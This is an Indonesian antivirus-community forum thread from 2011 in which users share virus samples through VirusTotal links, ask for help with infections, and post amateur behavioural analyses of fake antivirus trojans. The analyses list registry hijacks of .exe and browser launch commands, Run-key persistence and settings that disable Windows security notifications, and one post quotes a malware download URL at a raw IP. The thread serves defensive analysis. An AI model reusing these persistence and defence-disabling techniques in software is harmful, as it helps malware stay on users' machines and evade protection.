gan coba tulungin cek file yg ini, kompi ga bisa akses situs antivirus luar lg  :'( :'(


Lain kali kalo uplot virus dikompres dulu ya :)
Ni hasil dr virustotal:
ccdgf.rar
Submission date:
2011-10-11 12:27:52 (UTC)
Current status:
finished
Result:
17/ 43 (39.5%)
http://www.virustotal.com/file-scan/report.html?id=5fdc1632e9f4c69bbd5d8dbf2e783904b532d1cdf893e0d6c19a20017f7f0d76-1318336072
Sepertinya memang virus :)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ki@mhu pada Oktober 11, 2011, 08:05:29 PM
gan coba tulungin cek file yg ini, kompi ga bisa akses situs antivirus luar lg  :'( :'(

Setelah dijalankan lewat fitur sandbox, ane gak nemuin ada gejala virus sewaktu ditelusuri tingkah lakunya dalam virtual sistem. Setelah file exe ini dijalankan, akan ada file Aeiwiw.exe di folder C:\Documents and Settings\%User Name%\Application Data. Tidak ada penambahan file dan modifikasi registry yang mencurigakan. Avira ane yang baru diupdate pun tidak mendeteksi apa2. Tapi ane gak berani ngasi kesimpulan apa2 karena masih nubie.. Hehe..
Agan nemuin file ini di mana?

Ane coba upload Aeiwiw.exe di sini:
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: acongg pada Oktober 11, 2011, 08:09:45 PM
gan coba tulungin cek file yg ini, kompi ga bisa akses situs antivirus luar lg  :'( :'(

Setelah dijalankan lewat fitur sandbox, ane gak nemuin ada gejala virus setelah ditelusuri tingkah lakunya dalam virtual sistem. Avira ane yang baru diupdate pun tidak mendeteksi apa2. Tapi ane gak berani ngasi kesimpulan apa2 karena masih nubie.. Hehe..

avira ente abal-abal kaleeee  ;D ;D , coba update sekali lagi. avira 2012 gw udah detek lho gan  :-bd . itu file jelas virus,..  :D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ki@mhu pada Oktober 11, 2011, 08:12:53 PM
gan coba tulungin cek file yg ini, kompi ga bisa akses situs antivirus luar lg  :'( :'(

Setelah dijalankan lewat fitur sandbox, ane gak nemuin ada gejala virus setelah ditelusuri tingkah lakunya dalam virtual sistem. Avira ane yang baru diupdate pun tidak mendeteksi apa2. Tapi ane gak berani ngasi kesimpulan apa2 karena masih nubie.. Hehe..

avira ente abal-abal kaleeee  ;D ;D , coba update sekali lagi. avira 2012 gw udah detek lho gan  :-bd . itu file jelas virus,..  :D
Avira ane yang versi 2011. Avira ente kan masih versi beta, jadi ane belum pake.. Hehe..
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: acongg pada Oktober 11, 2011, 08:21:06 PM
wah agan ketinggalan berita nehh  ;D ;D =)) =)) http://www.avira.com/en/for-home udah versi final broo :D , udah versi 12.0.0.851 pantess ga mempan tuhh  ;D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ki@mhu pada Oktober 11, 2011, 08:36:08 PM
wah agan ketinggalan berita nehh  ;D ;D =)) =)) http://www.avira.com/en/for-home udah versi final broo :D , udah versi 12.0.0.851 pantess ga mempan tuhh  ;D
Wahh.. Bener gan.. Jadi malu..  :)
Berat gak gan? Tapi setelah ane tes file ini, gak ada gejala virus tuhh.. Mgkn x yang versi terbaru lebih kompleks jadi bisa false detect..
But aniwei, thx infonya gan.. Bentar lagi ane sedot tuh AV terbaik sejagat..  :-bd
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: acongg pada Oktober 11, 2011, 08:53:26 PM
langsung ke thread avira aja gan :-bd :-bd :-bd
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: barubelajar pada Oktober 11, 2011, 11:10:57 PM
Kutip dari:  b_agoy
Lain kali kalo uplot virus dikompres dulu ya :)

aduh...maap gan, ane masi lugu abis, ntar lain kali pasti ane kompres  :D

Kutip dari:  Ki@mhu
Agan nemuin file ini di mana?
ini file di kompie ane,die sembunyi dalam recyclebin, ciri2nya uda ane tulis di http://smadaver.com/konsultasi-virus/kido-downdup-conflicker-%28semuanya-itu2-juga%29/380/

sebelumnya ada jg file .exe yg mencurigakan dgn nama random besarnya 44kb, tapi udah ane apus semua dr safemode,begitu masuk ke normal mode eeeh malah mucul yg besarnya 120kb  :'( gan tulungin yakk, ane uda mumet abis nih ga bisa apdet antivirus,  mana webguard avira ane bunyi tetottetot mulu sambil bilangin  
"When accessing data from the URL, "http://146.185.246.134/zaberz.exe"
a virus or unwanted program 'TR/Crypt.ZPACK.Gen' [trojan] was found.
Action taken: Move file to quarantine"

juga ada file .tmp yg kedetect, kayak "Virus or unwanted program 'TR/Crypt.ZPACK.Gen [trojan]'
detected in file 'C:\Documents and Settings\acer\Application Data\51.tmp.
Action performed: Deny access"

tapi setelah ane scan dan semua file yg mencurigakan uda di tendang ke quarantine, tetep aja muncul lagi.
duh...andromeda... :o


Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: b_agoy pada Oktober 12, 2011, 12:03:05 AM
Wah, keliatannya sudah mulai2 OOT nih... :D
Untuk masalah Avira silahkan langsung dibahas di http://smadaver.com/antivirus-impor/avira-antivir/1090/
Untuk masalah virusnya silahkan melanjutkan pembahasan di http://smadaver.com/konsultasi-virus/kido-downdup-conflicker-%28semuanya-itu2-juga%29/380/

Terimakasih :)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: b4tt0541 pada Oktober 12, 2011, 02:24:30 AM
tolong dibantu suhu2 skalian  ^:)^, kronologis PC saya:

1. Pc menjadi lemod/lalod, tidak seperti biasax  :'(
2. Ketika tiap mencolokkan Flashdisk / Portable HD / KartuMemori HP slalu muncul tulisan file sbb:
 - Copy Shortcut 1
 - Copy Shortcut 2
 - Copy Shortcut 3
 - Copy Shortcut 4
3. Ketika saya coba format media portable tsb, ketika di colok lg ke PC saya keluar lg file" tersebut, padahal PC saya udah saya lakukan scanning dengan Smadav terbaru revisi 8.7  :(
4. Berikut ini saya sertakan format log scan smadav.

mohon dibantu, trims bfore.
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: PhaMenThaR pada Oktober 12, 2011, 09:35:41 AM
tolong dibantu suhu2 skalian  ^:)^, kronologis PC saya:
1. Pc menjadi lemod/lalod, tidak seperti biasax  :'(
2. Ketika tiap mencolokkan Flashdisk / Portable HD / KartuMemori HP slalu muncul tulisan file sbb:
 - Copy Shortcut 1
 - Copy Shortcut 2
 - Copy Shortcut 3
 - Copy Shortcut 4
3. Ketika saya coba format media portable tsb, ketika di colok lg ke PC saya keluar lg file" tersebut, padahal PC saya udah saya lakukan scanning dengan Smadav terbaru revisi 8.7  :(
4. Berikut ini saya sertakan format log scan smadav.
mohon dibantu, trims bfore.
emang di komputer nya cuma ada AV Smadav aja ya bro ???
coba tes scanning dengan AV Impor seperti Eset, Avira, Kaspersky atw yang laen nya :D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: RefrizaL pada Oktober 12, 2011, 07:56:58 PM
Cek PM mas b4tt0541
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: ponco wiibowo pada Oktober 18, 2011, 02:00:40 PM
buat nambahin db nya smadav gan  <=) apa aja boleeeeeeh  ;D
1. virus qvod
2. virus dorkbot

http://www.virustotal.com/file-scan/report.html?id=d72c26145bb41876721b1ab3c58e56b65b5381b6f3b54ab222f5669c769ca395-1318920473

http://www.virustotal.com/file-scan/report.html?id=d79bcb462a753da2256ccbf464a418e4ed17ce53f7349eb886539f50d8f315d5-1318920627
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: ponco wiibowo pada Oktober 18, 2011, 02:13:42 PM
ponco punya virus galak ,namanya Autoit gan. nod32 sama avira aja belum detek tuh gan. tuh virusnya ada di folder ponco ganteng  ;D

http://www.virustotal.com/file-scan/report.html?id=7e7ffb8d141f6663ec7a39b67da707b877a6a58bfb4918fbf9ec99893ea5482f-1318921368
salam junker,
ponco <=)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ki@mhu pada Oktober 18, 2011, 09:09:50 PM
ponco punya virus galak ,namanya Autoit gan. nod32 sama avira aja belum detek tuh gan. tuh virusnya ada di folder ponco ganteng  ;D

http://www.virustotal.com/file-scan/report.html?id=7e7ffb8d141f6663ec7a39b67da707b877a6a58bfb4918fbf9ec99893ea5482f-1318921368
salam junker,
ponco <=)
Ijin sedot yahh.. :)
Dapat darimana virus ini? Jangan2 buatan sendiri? :P
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: ponco wiibowo pada Oktober 18, 2011, 09:14:57 PM
ponco punya virus galak ,namanya Autoit gan. nod32 sama avira aja belum detek tuh gan. tuh virusnya ada di folder ponco ganteng  ;D

http://www.virustotal.com/file-scan/report.html?id=7e7ffb8d141f6663ec7a39b67da707b877a6a58bfb4918fbf9ec99893ea5482f-1318921368
salam junker,
ponco <=)
Ijin sedot yahh.. :)
Dapat darimana virus ini? Jangan2 buatan sendiri? :P
ok.bukan gan , gw ga bisa bikin virus gan. itu gw dapet dari komunitas vimaker gan  :D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ki@mhu pada Oktober 18, 2011, 09:20:27 PM
ponco punya virus galak ,namanya Autoit gan. nod32 sama avira aja belum detek tuh gan. tuh virusnya ada di folder ponco ganteng  ;D

http://www.virustotal.com/file-scan/report.html?id=7e7ffb8d141f6663ec7a39b67da707b877a6a58bfb4918fbf9ec99893ea5482f-1318921368
salam junker,
ponco <=)
Ijin sedot yahh.. :)
Dapat darimana virus ini? Jangan2 buatan sendiri? :P
ok.bukan gan , gw ga bisa bikin virus gan. itu gw dapet dari komunitas vimaker gan  :D
Kalo boleh, PM gue dnk link komunitas vimaker.. Soalnya ane suka koleksi virus.. Dah bosan koleksi perangko soalnya..  ;D
Thx gan..
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: ponco wiibowo pada Oktober 18, 2011, 09:23:12 PM
lupa gan :D , nanti gw kasih deh. terserah agan mau virus lokal/impor jg ada. mulai dr brontok sampe ngrbot/one production gw ada gan  :-bd <=).
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ki@mhu pada Oktober 18, 2011, 09:36:25 PM
Thx gan.. Ane tunggu yah gan.. :-bd
Upload lagi di sini kalo agan ketemu lagi sama yang killer. :)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: ponco wiibowo pada Oktober 18, 2011, 09:43:35 PM
Thx gan.. Ane tunggu yah gan.. :-bd
Upload lagi di sini kalo agan ketemu lagi sama yang killer. :)
oke agan :-bd
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: ponco wiibowo pada Oktober 20, 2011, 03:01:56 PM
trojan gan  :D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ki@mhu pada Oktober 20, 2011, 06:27:41 PM
trojan gan  :D
Apapun itu, ijin sedot lagi gann.. :D ;D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: eprimasatya pada Oktober 21, 2011, 08:19:00 PM
inin dicurigai sebagai Security Sphere 2012, ini bikin kesel g bisa ilang om admin.
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: ertht2011 pada Oktober 24, 2011, 11:58:43 AM
Halo Gan, tolongin dong. virus ini gangguin komputer jaringan di kantor ane nih. Jaringan jadi lambat. Setiap komputer client lama sekali login ke server. Kalo sudah bisa masuk, tiba-tiba windows explorer bisa hang dan itu dialami oleh semua komputer serentak. Ane sdh coba scan semua komputer termasuk server. Di server tdk terdetek virus. Di client ada beberapa yg kena virus backdoor, trojan dan antek2nya, tapi setelah dibersihkan jaringannya tetep lambat. Ada yang bisa tolong bantu kasih solusi nga? AGan Harboot dan temen2 tolongin dong. Thanks ya ditunggu solusinya.
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: ponco wiibowo pada Oktober 25, 2011, 01:19:03 PM
tolong gan, virus ini bahaya gan ,gw dapet pas lg ngenet  :'( :'(  :'( <=)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: ponco wiibowo pada Oktober 27, 2011, 06:56:31 PM
waduh gw nemu virus lg :o blon bnyak yg bs detek nih  :D <=)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: MiloMen™ pada Oktober 28, 2011, 12:58:08 PM
waduh gw nemu virus lg :o blon bnyak yg bs detek nih  :D <=)
Terima kasih. Sampel virus anda sudah saya teruskan ke berbagai antivirus luar negeri. :)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ki@mhu pada Oktober 28, 2011, 04:05:17 PM
Wahh.. Kebanyakan sampel2nya gak jalan di sandbox nihh.. Jadi bahan pajangan aja d rumah.. =))
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: ponco wiibowo pada Oktober 29, 2011, 02:50:49 PM
@Ki@mhu: knapa gan? ???nih gw punya sampel vista security 2012. silahkan di analisis ya gan  :D  ;D pasti bisa deh ente gan,,

http://www.virustotal.com/file-scan/report.html?id=4008a1db07fa3fbc366d23e8c73c52af10fb0c5e03f65dc8e6481dbbe52d8117-1319873817
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ki@mhu pada Oktober 30, 2011, 02:26:37 AM
@Ki@mhu: knapa gan? ???nih gw punya sampel vista security 2012. silahkan di analisis ya gan  :D  ;D pasti bisa deh ente gan,,

http://www.virustotal.com/file-scan/report.html?id=4008a1db07fa3fbc366d23e8c73c52af10fb0c5e03f65dc8e6481dbbe52d8117-1319873817

Ane uda tes.. Serem juga gan virus yang ini.. Agan uda sempet analisis yang ini? Sample virus dari agan kebanyakan gak jalan di sandbox.. Yang ini kebetulan jalan.. ;D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ryan BeKaBe pada Oktober 30, 2011, 06:21:29 AM
Terima kasih kepada rekan-rekan yang telah membantu mengupload virus ke forum ini!
Virus akan dianalisa.
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: ponco wiibowo pada Oktober 30, 2011, 08:41:49 AM
@Ki@mhu: knapa gan? ???nih gw punya sampel vista security 2012. silahkan di analisis ya gan  :D  ;D pasti bisa deh ente gan,,

http://www.virustotal.com/file-scan/report.html?id=4008a1db07fa3fbc366d23e8c73c52af10fb0c5e03f65dc8e6481dbbe52d8117-1319873817

Ane uda tes.. Serem juga gan virus yang ini.. Agan uda sempet analisis yang ini? Sample virus dari agan kebanyakan gak jalan di sandbox.. Yang ini kebetulan jalan.. ;D
udah gan udah gw analisa, klo yg kemaren2 itu gw dapet lngsung waktu browsing, kemungkinan sejenis trojan downloader  :-bd

nih gan analisa gw, masih cupu sih  :D
vista security 2012

crc32: AB0A3573

md5: -d53a2edb82d99a6d0c35b8d7c88283d1
        -3447c5d342d7b06fd37e7fc14a7bcc54


membuat file di:
C:\Users\MasterRat\AppData\Local\yyl.exe
C:\Users\MasterRat\AppData\Local\psf.exe
C:\2881ccqxd6b08n15iyf3516c800p81e
(hidden) C:\Users\MasterRat\AppData\Local\2881ccqxd6b08n15iyf3516c800p81e
(hidden) C:\Users\MasterRat\AppData\Local\Temp\2881ccqxd6b08n15iyf3516c800p81e9
(hidden) C:\Users\MasterRat\AppData\Roaming\Microsoft\Windows\Templates\2881ccqxd6b08n15iyf3516c800p81e

membuat registry di:
machine\software\Clients\StartMenuInternet\FIREFOX.EXE\shell\open\command  = "C:\Users\MasterRat\AppData\Local\yyl.exe" -a "C:\Program Files\Mozilla Firefox\firefox.exe"

machine\software\Clients\StartMenuInternet\IEXPLORE.EXE\shell\open\command  = "C:\Users\MasterRat\AppData\Local\yyl.exe" -a "C:\Program Files\Internet Explorer\iexplore.exe"

user\current\software\Microsoft\Windows\CurrentVersion\Run\237601479 = C:\Users\MasterRat\AppData\Local\yyl.exe
user\current\software\Microsoft\Windows\CurrentVersion\Run\ctfmon.exe = C:\WINDOWS\system32\ctfmon.exe
user\current_classes\.exe\shell\open\command  = "C:\Users\MasterRat\AppData\Local\yyl.exe" -a "%1" %*
user\current_classes\.exe\shell\open\command\IsolatedCommand = "%1" %*
user\current_classes\exefile\shell\open\command  = "C:\Users\MasterRat\AppData\Local\yyl.exe" -a "%1" %*
user\current_classes\exefile\shell\open\command\IsolatedCommand = "%1" %*

created name:
Created an event named: 45tf8549at36y
Created an event named: b858o7q6228135xh14emmf0vm
Created an event named: jhc84359j
Created an event named: nk4c84lax765gmj8j7bem4ax515
Opened a service named: MsMpSvc
Opened a service named: WinDefend


membuka internet connection ke beberapa IP Adress (sorry ga sempet di tulis)  ;D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: ponco wiibowo pada Oktober 30, 2011, 09:19:53 AM
gw nemu FAKEAV lagi gan. XP Antispyware 2011 gan!  <=)
ati-ati gan jangan sembarangan klik yang berbau Parno ya gan,,, bisa-bisa ente kena antivirus palsu gan ;D ;D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ryan BeKaBe pada Oktober 30, 2011, 12:07:40 PM
@Ki@mhu: knapa gan? ???nih gw punya sampel vista security 2012. silahkan di analisis ya gan  :D  ;D pasti bisa deh ente gan,,

http://www.virustotal.com/file-scan/report.html?id=4008a1db07fa3fbc366d23e8c73c52af10fb0c5e03f65dc8e6481dbbe52d8117-1319873817

Ini hasilnya => (https://fbcdn-sphotos-a.akamaihd.net/hphotos-ak-ash4/391887_1923664830294_1802317697_1306531_413208499_n.jpg)

=> (https://fbcdn-sphotos-a.akamaihd.net/hphotos-ak-ash4/386754_1923665710316_1802317697_1306532_46924324_n.jpg)
Cukup rubah registrynya maka virus sudah tidak berjalan.

Salam bebas virus
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ryan BeKaBe pada Oktober 30, 2011, 12:19:40 PM
gw nemu FAKEAV lagi gan. XP Antispyware 2012 gan!  <=)
ati-ati gan jangan sembarangan klik yang berbau Parno ya gan,,, bisa-bisa ente kena antivirus palsu gan ;D ;D

Oke, terima kasih banyak, nanti kalau saya ada waktu akan saya kasih hasilnya lagi.
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ki@mhu pada Oktober 30, 2011, 01:51:47 PM
Saya minta izin menambahkan hasil analisis pada "XP Internet Secutiry 2012"

Sewaktu kita menjalankan file virus ini, akan muncul warning palsu dari security alert bahwa firewall kita gak berfungsi lagi dan file virus yang kita jalankan ini akan terhapus dengan sendirinya utk menghilangkan jejak sampelnya.

1. Virus ini membuat file di:
C:\Documents and Settings\%USER%\Local Settings\Application Data\GDIPFONTCACHEV1.DAT
C:\Documents and Settings\%USER%\Local Settings\Application Data\xxx.exe. (xxx=3 huruf acak)
C:\Documents and Settings\%USER%\Local Settings\Application Data\2881ccqxd6b08n15iyf3516c800p81e

2. Memerintahkan services.exe untuk menghapus service windows yang bernama "Automatic Updates". (Sewaktu nyoba2 virus ini, ternyata service ini dihapus dan belum ada AV yang bisa memulihkan service windows yang terlanjur dihapus. CMIIW.. Setelah browsing2, ane baru dapat cara memulihkannya di sini (http://support.microsoft.com/kb/883614)).

3. Icon tray task bar tidak ada pilihan exit sewaktu diklik kanan..

Registry:

- Mengubah "default value" pada [HKLM\MACHINE\Software\Clients\StartMenuInternet] menjadi "IEXPLORE.EXE". (Mungkin untuk mengubah default browser ke Internet Explorer)

- Mengubah "default value" pada [HK_USER\S-1-5-21-1606980848-1647877149-2146704303-1003\SOFTWARE\Clients\StartMenuInternet] menjadi: "IEXPLORE.EXE". (Sama dengan tujuan di atas)

- Mengubah "default value" pada [HKLM\software\Clients\StartMenuInternet\FIREFOX.EXE\shell\open\command] dari:
[C:\Program Files\Mozilla Firefox\firefox.exe] menjadi:
[\"C:\\Documents and Settings\\UserXP\\Local Settings\\Application Data\\xxx.exe\"-a \"C:\\Program Files\\Mozilla Firefox\\firefox.exe\"]
(agar sewaktu menjalankan mozilla, virus induk "xxx.exe" ini juga ikut aktif)

- Mengubah "default value" pada [HKLM\software\Clients\StartMenuInternet\FIREFOX.EXE\shell\safemode\command] dari:
[C:\Program Files\Mozilla Firefox\firefox.exe -safe-mode] menjadi:
[\"C:\\Documents and Settings\\UserXP\\Local Settings\\Application Data\\xxx.exe\"-a \"C:\\Program Files\\Mozilla Firefox\\firefox.exe\" -safe-mode]
(agar xxx.exe juga aktif sewaktu melakukan private browsing dengan mozilla)

- Mengubah "default value" pada [HKLM\software\Clients\StartMenuInternet\IEXPLORE.EXE\shell\open\command] dari:
[C:\Program Files\Internet Explorer\iexplore.exe] menjadi:
[\"C:\\Documents and Settings\\UserXP\\Local Settings\\Application Data\\xxx.exe\"-a \"C:\\Program Files\\Internet Explorer\\iexplore.exe\"] (Hal yang sama juga terjadi pada IE)


- Merubah dan merubah registry untuk melemahkan antivirus dan firewall:

[HKLM\software\microsoft\Security Center]
AntiVirusDisableNotify
AntiVirusOverride
FirewallDisableNotify
FirewallOverride
UpdatesDisableNotify

(kelima value ini diubah dari 0 menjadi 1)

[HKLM\system\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile]
EnableFirewall = 1
DoNotAllowExceptions = 0
DisableNotifications = 1

[HKLM\system\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
EnableFirewall = 1
DoNotAllowExceptions = 0
DisableNotifications = 1

- Mengaktifkan dirinya saat windows melakukan startup: (Memanggil ctfmon.exe juga sekalian tetapi tidak mengeinjeksi ctfmon.exe)

[HK_USER\S-1-5-21-1606980848-1647877149-2146704303-1003\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"ctfmon.exe"="C:\\WINDOWS\\system32\\ctfmon.exe"
"237601479"="C:\\Documents and Settings\\UserXP\\Local Settings\\Application Data\\xxx.exe"

- Membuat agar dirinya diaktifkan saat user membuka file exe

[HK_USER\S-1-5-21-1606980848-1647877149-2146704303-1003_Classes\.exe]
"Default Name"="exefile"
"Content Type"="application/x-msdownload"

[HK_USER\S-1-5-21-1606980848-1647877149-2146704303-1003_Classes\.exe\DefaultIcon]
"Default Name"="%1"

[HK_USER\S-1-5-21-1606980848-1647877149-2146704303-1003_Classes\.exe\shell\open\command]
"Default Name"="\"C:\\Documents and Settings\\UserXP\\Local Settings\\Application Data\\xxx.exe\"
-a \"%1\" %*"
"IsolatedCommand"="\"%1\" %*"

[HK_USER\USER\S-1-5-21-1606980848-1647877149-2146704303-1003_Classes\.exe\shell\runas\command]
"Default Name"="\"%1\" %*"
"IsolatedCommand"="\"%1\" %*"

Kalo mengenai port yang dibuka, ane gak tau cara analisisnya gan.. ??? Minta petunjuknya donk gan..

Mohon dikoreksi kalo ada salah.. :)

@Ki@mhu: knapa gan? ???nih gw punya sampel vista security 2012. silahkan di analisis ya gan  :D  ;D pasti bisa deh ente gan,,

http://www.virustotal.com/file-scan/report.html?id=4008a1db07fa3fbc366d23e8c73c52af10fb0c5e03f65dc8e6481dbbe52d8117-1319873817

Ini hasilnya => (https://fbcdn-sphotos-a.akamaihd.net/hphotos-ak-ash4/391887_1923664830294_1802317697_1306531_413208499_n.jpg)

=> (https://fbcdn-sphotos-a.akamaihd.net/hphotos-ak-ash4/386754_1923665710316_1802317697_1306532_46924324_n.jpg)
Cukup rubah registrynya maka virus sudah tidak berjalan.

Salam bebas virus
Bukannya virus itu masih aktif jika user melakukan akses ke file exe dan browser? CMIIW.. Trims atas jawabannya.. :)

gw nemu FAKEAV lagi gan. XP Antispyware 2012 gan!  <=)
ati-ati gan jangan sembarangan klik yang berbau Parno ya gan,,, bisa-bisa ente kena antivirus palsu gan ;D ;D

Oke, terima kasih banyak, nanti kalau saya ada waktu akan saya kasih hasilnya lagi.
Berarti agan juga sering2 donk.. Makanya dapat byk sample..  ;D ;D ;D Piss.. :P
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: ponco wiibowo pada Oktober 30, 2011, 06:57:46 PM
@Ryan bekabe: sama sama gan  :-bd

@ki@mhu: gw punya banyak antivirus palsu gan,bingung mao diapain ???. dimakan ga bisa  ;D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ki@mhu pada Oktober 30, 2011, 08:28:25 PM
@Ryan bekabe: sama sama gan  :-bd

@ki@mhu: gw punya banyak antivirus palsu gan,bingung mao diapain ???. dimakan ga bisa  ;D
Diupload sini aja gan.. Karena itu sudah sangat membantu utk penanganan virus.. :)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: ponco wiibowo pada Oktober 30, 2011, 10:14:59 PM
@Ryan bekabe: sama sama gan  :-bd

@ki@mhu: gw punya banyak antivirus palsu gan,bingung mao diapain ???. dimakan ga bisa  ;D
Diupload sini aja gan.. Karena itu sudah sangat membantu utk penanganan virus.. :)
oke gan. karna gw udah dapet smadkey,gw mau upload virus dimari  ;D <=)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ryan BeKaBe pada Oktober 31, 2011, 06:15:10 AM
@Ryan bekabe: sama sama gan  :-bd

@ki@mhu: gw punya banyak antivirus palsu gan,bingung mao diapain ???. dimakan ga bisa  ;D
Diupload sini aja gan.. Karena itu sudah sangat membantu utk penanganan virus.. :)
oke gan. karna gw udah dapet smadkey,gw mau upload virus dimari  ;D <=)
Hehe, ditunggu lho. ;)


@Ki@mhu: Owh begitu ya, silakan sambil coba ya, kayaknya bisa jadi begitu.
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: ponco wiibowo pada November 01, 2011, 10:15:13 AM
gan ada virus lg gan, menyamar sebagai virtual machine services dari Microsoft. avira gw langsung teriak gan  ;D ;D

VT Result:
26/ 43 (60.5%)
http://www.virustotal.com/file-scan/report.html?id=f2dfa16951637c41214d4a7a01b268ede6ea0bb5308c0607c0ca3ace180724e5-1320116788
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: MiloMen™ pada November 01, 2011, 11:03:40 AM
gan ada virus lg gan, menyamar sebagai virtual machine services dari Microsoft. avira gw langsung teriak gan  ;D ;D

VT Result:
26/ 43 (60.5%)
http://www.virustotal.com/file-scan/report.html?id=f2dfa16951637c41214d4a7a01b268ede6ea0bb5308c0607c0ca3ace180724e5-1320116788
mantap, kalo bisa cari virus yang belum terditeksi antivirus bro... :D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: ponco wiibowo pada November 01, 2011, 11:31:21 AM
ada gan! khusus buat yg doyan nonton Bo**p jgn coba2 klik file ini ya gan  ;D ;D avira, avast, avg, mse belon detek gan.

Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: klasnich pada November 01, 2011, 12:46:49 PM
klo bisa samplenya di upload di mari gan ponco...  :-bd
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: suryascience pada November 01, 2011, 02:03:57 PM
ada gan! khusus buat yg doyan nonton Bo**p jgn coba2 klik file ini ya gan  ;D ;D avira, avast, avg, mse belon detek gan.

Sama ClamAV kedetek sebagai Junk File Gan !
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: MiloMen™ pada November 01, 2011, 05:09:41 PM
ada gan! khusus buat yg doyan nonton Bo**p jgn coba2 klik file ini ya gan  ;D ;D avira, avast, avg, mse belon detek gan.
Sampelnya udh saya submit ke berbagai antivirus luar jd tinggal nunggu hasil analisanya, btw masih ada lagi koleksi virus yang belum terditeksi antivirus impor monggo upload kesini lagi. :D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ki@mhu pada November 01, 2011, 06:34:58 PM
ada gan! khusus buat yg doyan nonton Bo**p jgn coba2 klik file ini ya gan  ;D ;D avira, avast, avg, mse belon detek gan.
Sampelnya udh saya submit ke berbagai antivirus luar jd tinggal nunggu hasil analisanya, btw masih ada lagi koleksi virus yang belum terditeksi antivirus impor monggo upload kesini lagi. :D
Good job.. Biar pengguna AV impor secepatnya terlindungi. Kalo boleh tau, agan upload ke mana2 aja? :)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Anang Wahyudi pada November 02, 2011, 09:48:17 AM
Salam Smadaver...
Saya baru saja mengupload virus dengan nama watermark yang menginject ke dalam folder c:/programfile/microsoft/ dan file ini akan membuat folder recycler dan akan mengumpulkan virus - virus lainnya. Saat ini baru Eset Node yang bisa mendetect, tetapi yang menjadi kendala jika folder recycler yang terbentuk sudah besar kapasitasnya, sehingga selalu muncul notifikasi yang mengesalkan karena lama sekali prosesnya. Disamping itu Eset Node tidak bisa melakukan perbaikan jika sistem sudah terinfeksi watermark tersebut. Kemudian virus ini juga akan masuk kedalam userinit. Sehingga cukup mengesalkan sekali. Saat ini saya menghandle virus ini masih manual dengan melakukan end proses of tree terhadap svchost.exe dalam task manager, baru kemudian menghapus file dan memperbaiki dalam regedit. Tetapi yang menjadi kendala jika virus ini masuk ke dalam system Windows 7, dan akan susah sekali, karena svchost tidak mau dimatikan dari task manager. Mohon tim Smadav untuk membuatkan update terbaru dalam waktu yang tidak terlalu lama... Karena sangat Urgent sekali.. Terimakasih sebelumnya...
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Anang Wahyudi pada November 02, 2011, 10:17:31 AM
Up Load Virus Watermark
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: klasnich pada November 02, 2011, 11:00:06 AM
watermark itu ramnit gan.  :D
cari dah info2 soal ramnit, dah banyak yang nulis ko...  :-bd
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ki@mhu pada November 02, 2011, 02:36:40 PM
Pake Ramnit killer dari PCMAV aja.. Uda byk yang pernah coba koq di sini
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: ponco wiibowo pada November 02, 2011, 02:56:04 PM
sampel lagi gan  <=)  :D baru dikit yg bs detek :o

VT :
